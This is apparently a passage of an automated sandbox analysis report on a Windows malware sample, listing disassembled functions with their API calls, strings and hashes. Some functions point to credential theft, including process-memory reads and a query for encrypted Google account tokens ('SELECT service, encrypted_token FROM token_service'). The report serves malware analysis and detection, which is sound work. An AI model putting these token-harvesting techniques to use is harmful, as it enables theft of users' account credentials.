                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2507841554-0
                                                                                                                                                                                          • Opcode ID: 48250461f9ba7cd274cf737684636cf8d4e661aa40784fbc1100f753ffb8dd0d
                                                                                                                                                                                          • Instruction ID: e471ed14e9fb89c1b6e011c684f9b5ff1ccacbb470c045fd6bc8387d0c26224c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 48250461f9ba7cd274cf737684636cf8d4e661aa40784fbc1100f753ffb8dd0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6412EB190012CABDF309B20EC49BDE7BB8EF08315F1001A5BB09A6152DA319EC5CFA5
                                                                                                                                                                                          Function 0004660D Relevance: 13.6, APIs: 9, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00046634
                                                                                                                                                                                          • _free.LIBCMT ref: 00046642
                                                                                                                                                                                          • _free.LIBCMT ref: 0004664D
                                                                                                                                                                                          • _free.LIBCMT ref: 00046621
                                                                                                                                                                                            • Part of subcall function 0003D93B: HeapFree.KERNEL32(00000000,00000000,?,0003D18F,00000000,0005B6F4,0003D1D6,0002EEBE,?,?,0003D2C0,0005B6F4,?,?,0004EC38,0005B6F4), ref: 0003D951
                                                                                                                                                                                            • Part of subcall function 0003D93B: GetLastError.KERNEL32(?,?,?,0003D2C0,0005B6F4,?,?,0004EC38,0005B6F4,?,?,?), ref: 0003D963
                                                                                                                                                                                          • ___free_lc_time.LIBCMT ref: 0004666B
                                                                                                                                                                                          • _free.LIBCMT ref: 00046676
                                                                                                                                                                                          • _free.LIBCMT ref: 0004669B
                                                                                                                                                                                          • _free.LIBCMT ref: 000466B2
                                                                                                                                                                                          • _free.LIBCMT ref: 000466C1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3704779436-0
                                                                                                                                                                                          • Opcode ID: 92ccc8b7e763352330c8b41afd7588ef925d400a857cb4576e1f92479ba3c0e6
                                                                                                                                                                                          • Instruction ID: 7718369ca67321932b97062f5284f26b81f5119a875f59aaa6f48c5625442c9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 92ccc8b7e763352330c8b41afd7588ef925d400a857cb4576e1f92479ba3c0e6
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC1194F2101301ABDF326F75E885B9AB3E9AB02709F15093FE14997102DA36AD45CB16
                                                                                                                                                                                          Function 6C41ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C41F100: LoadLibraryW.KERNEL32(shell32,?,6C48D020), ref: 6C41F122
                                                                                                                                                                                            • Part of subcall function 6C41F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C41F132
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000012), ref: 6C41ED50
                                                                                                                                                                                          • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C41EDAC
                                                                                                                                                                                          • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C41EDCC
                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 6C41EE08
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C41EE27
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C41EE32
                                                                                                                                                                                            • Part of subcall function 6C41EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C41EBB5
                                                                                                                                                                                            • Part of subcall function 6C41EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C44D7F3), ref: 6C41EBC3
                                                                                                                                                                                            • Part of subcall function 6C41EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C44D7F3), ref: 6C41EBD6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C41EDC1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                          • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                          • API String ID: 1980384892-344433685
                                                                                                                                                                                          • Opcode ID: 225e95f0d4c655e2b8a230d53260137d35cff683c51fba19f89d2de86aaa0490
                                                                                                                                                                                          • Instruction ID: edab7a2127c6b4418ca00ea7cd8b80a3f9b62dd03d42b785d4d1da8fe7f9aa4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 225e95f0d4c655e2b8a230d53260137d35cff683c51fba19f89d2de86aaa0490
                                                                                                                                                                                          • Instruction Fuzzy Hash: A651C075D093158BDB00DF68C885EBEB7B0AF59318F44852DE89567F40E730A949C7E2
                                                                                                                                                                                          Function 0002F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0002FBE3,?,00000000,00000000,?,?), ref: 0002F934
                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0002FBE3,?,00000000,00000000), ref: 0002F95E
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0002F9AB
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0002FA04
                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0002FA5C
                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0002FBE3,?,00000000,00000000,?,?), ref: 0002FA6D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3835927879-2766056989
                                                                                                                                                                                          • Opcode ID: b1c22e0f223dfdc82a8042a1b93151b0b54edd3ce86ff795e0293035d4980693
                                                                                                                                                                                          • Instruction ID: 5d4b44bcc27b7e253c19be99d94efc728678dc34ceaf18ea2beb630c9b70784a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c22e0f223dfdc82a8042a1b93151b0b54edd3ce86ff795e0293035d4980693
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95419072A0021ABBEF109FA4EC49FEFBBB6FB447A0F148035F905A6190D7748951DB91
                                                                                                                                                                                          Function 6C548CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C55124D,00000001), ref: 6C548D19
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C55124D,00000001), ref: 6C548D32
                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C55124D,00000001), ref: 6C548D73
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C55124D,00000001), ref: 6C548D8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C55124D,00000001), ref: 6C548DBA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                          • Opcode ID: ec432111bc49792abc7391e871429a9d8184ac4d89959841b3b672a9e85a4f40
                                                                                                                                                                                          • Instruction ID: dbbe46945a868398d4fdccd268e1d4bf4c6fcbb6c40f1fdc159c3c063f78c71a
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec432111bc49792abc7391e871429a9d8184ac4d89959841b3b672a9e85a4f40
                                                                                                                                                                                          • Instruction Fuzzy Hash: C02148B5A05601DBCB40EF39C88465ABBF0BF85318F15C96AD999C7701EB34E885CBD2
                                                                                                                                                                                          Function 6C459420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C424A68), ref: 6C45945E
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C459470
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C459482
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C45949F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C45947D
                                                                                                                                                                                          • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C459459
                                                                                                                                                                                          • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C45946B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                          • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                          • API String ID: 4042361484-1628757462
                                                                                                                                                                                          • Opcode ID: fbc71ec76c02f5f2e66e9ebd034e0ef4a86cd95b79e67f289c5d52d9a5ff5dcd
                                                                                                                                                                                          • Instruction ID: 4114197cd822658864a69b2999928d09f4de64e0f4701973bea06c8b9878c8dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: fbc71ec76c02f5f2e66e9ebd034e0ef4a86cd95b79e67f289c5d52d9a5ff5dcd
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF01D8B0A051618BEB00EF9CD811E86377AEB36329F14453AED0686B41D732D8768A97
                                                                                                                                                                                          Function 6C604D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C604DC3
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C604DE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C604DCB
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C604DDA
                                                                                                                                                                                          • invalid, xrefs: 6C604DB8
                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C604DBD
                                                                                                                                                                                          • misuse, xrefs: 6C604DD5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                          • Opcode ID: 340023722a912c28371af14dad1a87d0bd45359b2709cf1c55ff0adcc71d4c34
                                                                                                                                                                                          • Instruction ID: c9f059af394520896016fe67bde50f59bb21914b6d6df2e075553996279979ce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 340023722a912c28371af14dad1a87d0bd45359b2709cf1c55ff0adcc71d4c34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0E911F145642BD7105116DE20FE637D59F26319F4609A0FD047BED2D286AC60C6DE
                                                                                                                                                                                          Function 6C604DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C604E30
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C604E4D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C604E38
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C604E47
                                                                                                                                                                                          • invalid, xrefs: 6C604E25
                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C604E2A
                                                                                                                                                                                          • misuse, xrefs: 6C604E42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                          • Opcode ID: 3503b717cdb5928740349c278bb7c987bc1b13afb08a5da73eac65634ea7ee91
                                                                                                                                                                                          • Instruction ID: c1b2ce8b248f9c76310f2150c03584b9223c617645626e10deecb0bddcec8ecf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3503b717cdb5928740349c278bb7c987bc1b13afb08a5da73eac65634ea7ee91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF02E21F445282FD63452169D10FE737855B21319F0945E1EB0477FE2D745A86242DE
                                                                                                                                                                                          Function 00029A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00029BB2
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00029BCF
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00029C7E
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00029C99
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                          • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                          • API String ID: 3306365304-1713091031
                                                                                                                                                                                          • Opcode ID: e1c46070804e1663d35b05567cb129702ea320989e0953b459c4b9ef8094fcfa
                                                                                                                                                                                          • Instruction ID: 7c80b1a86e59e071ed8d147a7f2d9d5a34d37dce6a9af07c78d1e923363f74e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1c46070804e1663d35b05567cb129702ea320989e0953b459c4b9ef8094fcfa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5881FA32900129EBCF02FBA4FD479DE77B9AF14305F510160F904B7167DB21AE999BA1
